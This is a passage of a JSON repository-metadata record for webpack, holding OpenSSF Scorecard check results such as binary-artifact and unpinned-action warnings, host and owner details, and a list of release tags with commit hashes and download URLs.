test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36825724,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-22T02:00:06.114Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1